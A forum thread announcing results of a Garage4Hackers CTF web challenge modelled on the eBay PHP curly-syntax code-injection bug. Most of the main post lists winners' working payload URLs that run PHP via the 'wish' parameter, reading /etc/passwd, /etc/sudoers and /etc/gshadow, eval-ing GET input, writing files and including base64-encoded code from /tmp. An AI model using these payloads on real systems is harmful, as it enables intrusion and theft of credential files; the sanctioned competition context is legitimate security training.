Results 1 to 6 of 6

Thread: Garage4Hackers CTF Web Level 1 challenge result Share/Save - My123World.Com!

  1. #1

    Garage4Hackers CTF Web Level 1 challenge result

    The Garage4Hackers CTF level 1 challenge came to life on 25th December, 2013 at 10:30 PM IST. It saw nice participation from across the globe with some really creative attempts to crack the challenge. It took us some serious judging to filter out the top attempts. Finally we are done with it. And now we are pleased to announce the results of our Level 1 challenge !!

    The Challenge was 54.197.234.66/index.php?wish=hohohoSanta :

    To try to execute simple PHP code or pwn the server and try to update the 54.197.234.66/updateme.txt.

    Also,

    safemode=on

    List of disabled functions:
    Code:
    dl,exec, passthru, shell_exec, system, proc_open, popen ,curl_exec, curl_multi_exec , parse_ini_file, show_source, url_exec, syslog, pcntl_alarm, pcntl_fork, pcntl_waitpid, pcntl_wait, pcntl_wifexited, pcntl_wifstopped, pcntl_wifsignaled ,pcntl_wexitstatus, pcntl_wtermsig, pcntl_wstopsig, pcntl_signal, pcntl_signal_dispatch, pcntl_get_last_error, pcntl_strerror, pcntl_sigprocmask, pcntl_sigwaitinfo, pcntl_sigtimedwait, pcntl_exec, pcntl_getpriority, pcntl_setpriority, allow_url_fopen, allow_url_include, stream_select
    Code:
    expose_php = Off
    display_errors = Off
    track_errors = Off
    html_errors = Off
    Vulnerability Description :

    I would like to give special thanks to David Vieira-Kurz(@secalert) for finding this awesome bug on Ebay. This kind of vulnerability was less known until lately when it shot to limelight (http://www.secalert.net/2013/12/13/e...ode-execution/) . We decided to make Level 1 challenge based on this vulnerability and tried to emulate the same flaw as in the case of eBay. For more details on the vulnerability check following blogs.
    Code:
    http://www.secalert.net/2013/12/13/ebay-remote-code-execution/
    http://gynvael.coldwind.pl/n/ebay_rce_analysis_wrong_question_mark

    Submissions from approximately 400 participants

    We saw approximately 400 individual participants looking to grab the prize. Payload attempts ranged from the blunt nessus scanners to really cool “insert the coolest attack here ”attacks.
    We have decided to release the total apache log generated during the challenge. You can download it by emailing us. Top submissions are based on best payload and then 1st come 1st out basis in case of same payload.

    Top submissions


    1. Xelenonz Lp.

    Code:
    http://54.197.234.66/index.php?wish[]=x
    
    http://54.197.234.66/index.php?wish={${phpinfo()}}
    
     http://54.197.234.66/index.php?wish={${highlight_file('./index.php')}}
    
    http://54.197.234.66/index.php?wish={${file_put_contents('updateme.txt','Xelenonz',FILE_APPEND)}};
    
    http://54.197.234.66/index.php?wish={${eval($_GET['code'])}}&code=file_put_contents('updateme.txt','Xelenonz',FILE_APPEND);
    
    http://54.197.234.66/index.php?wish={${print_r(glob("/tmp/*"))}}
    
    http://54.197.234.66/index.php?wish={${print_r(scandir($_GET['dir']))}}&dir=/tmp
    2. Pichaya Morimoto(LongCat)
    Code:
    http://54.197.234.66/index.php?wish={${readfile('/tmp/lnz')}}
    
    http://54.197.234.66/index.php?wish={${include('/tmp/lnz')}}
    
    http://54.197.234.66/index.php?wish={${print_r(stat("updateme.txt"))}}
    
    http://54.197.234.66/index.php?wish={${file_put_contents("/tmp/lnz",base64_decode("PD9waHAgcGhwaW5mbygpOyA/Pg=="))}}
    
    http://54.197.234.66/index.php?wish=/index.php?wish={${read_file('index.php')}}
    3. Mykola Ilin - solarwind [Defcon Ukraine]

    Code:
    http://54.197.234.66/index.php?wish=${include "/proc/cpuinfo"}
    
    http://54.197.234.66/index.php?wish=${include "/etc/passwd"}
    
    http://54.197.234.66/index.php?wish=${var_dump(glob("/proc/self/fd/*"))}
    
    http://54.197.234.66/index.php?wish=${var_dump(glob("/etc/*"))}
    
    http://54.197.234.66/index.php?/index.php?wish=${file_put_contents("updateme.txt","\\nsolarwind\\n",FILE_APPEND)}
    4. Pedro [tunelko]

    Code:
    http://54.197.234.66/index.php?wish=${var_dump(base64_decode('PD8gcGhwaW5mbygpOyBkaWUoKTs/Pg=='))}
    
    http://54.197.234.66/index.php?wish=${var_dump(file_get_contents('/etc/sudoers'))}
    
    http://54.197.234.66/index.php?wish=${var_dump(file_get_contents('/etc/gshadow'))}
    
    http://54.197.234.66/index.php?wish=${var_dump(ini_get('disable_functions'))}
    
    http://54.197.234.66/index.php?wish=${file_put_contents("updateme.txt","\nsolarwind\n",FILE_APPEND)}
    5. Nishant

    Code:
    54.197.234.66/index.php?wish={${phpinfo()}}
    
    54.197.234.66/index.php?wish={${file_put_contents('updateme.txt','nishant.dp@gmail.com at Thu, 26/12/2013 1:25AM IST')}}
    6. Bharadwaj Machiraju

    Code:
    54.197.234.66/index.php?wish={${phpinfo()}}
    
    http://54.197.234.66/index.php?wish=${file_put_contents("updateme.txt", "\ntunnelshade\n", FILE_APPEND)}
    7. Rahul Mali
    Code:
    54.197.234.66/index.php?wish={${phpinfo()}}
    54.197.234.66/index.php?wish={${fwrite(fopen("updateme.txt","a"),"Rahul%20Mali%20(rahulmali31415@gmail.com)")}}
    8. Piyush Pattanayak

    Code:
    54.197.234.66/index.php?wish={${phpinfo()}}
    
    54.197.234.66/index.php?wish=shoes({${file_put_contents('updateme.txt', 'Piyush Pattanayak', FILE_APPEND)}})
    -------------------------------------------------------------------------
    Note: Everyone tried execute PHP Curly Syntax as per our log information .However we can also execute the PHP code in the following way.
    Code:
    http://54.197.234.66/index.php?wish=%22%2bphpinfo%28%29%2b%22
    http://54.197.234.66/index.php?wish=".phpinfo()."
    -------------------------------------------------------------------------


    AND THE WINNERS ARE

    Xelenonz Lp. and Solarwind



    Special thanks all participant & of course gear up for Level 2

    Thank you !
    [S]
    Last edited by [s]; 12-27-2013 at 07:44 PM.
    Garage4Hackers bugs for the community , of the community

    We provide IT
    To view links or images in signatures your post count must be 10 or greater. You currently have 0 posts.
    :
    To view links or images in signatures your post count must be 10 or greater. You currently have 0 posts.
    |
    To view links or images in signatures your post count must be 10 or greater. You currently have 0 posts.


    To view links or images in signatures your post count must be 10 or greater. You currently have 0 posts.
    |
    To view links or images in signatures your post count must be 10 or greater. You currently have 0 posts.
    |
    To view links or images in signatures your post count must be 10 or greater. You currently have 0 posts.

  2. #2
    And I thought, I was the only one to use curly syntax.

  3. #3
    Webapp Secninja
    Join Date
    Aug 2012
    Location
    Ranchi, Jharkhand
    Posts
    41
    Blog Entries
    2
    Congratulations everyone! Great and neat efforts
    Hacking Wacking Sab Moh Maya Hai
    To view links or images in signatures your post count must be 10 or greater. You currently have 0 posts.

  4. #4
    Heartiest Congratulations for your achievement Xelenonz Lp. and Solarwind
    Keep going

  5. #5
    Congratzz Winners...

    How to get to know that any php site has this kind of vulnerability???

    plz tell me

  6. #6
    Congratulations everyone!

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •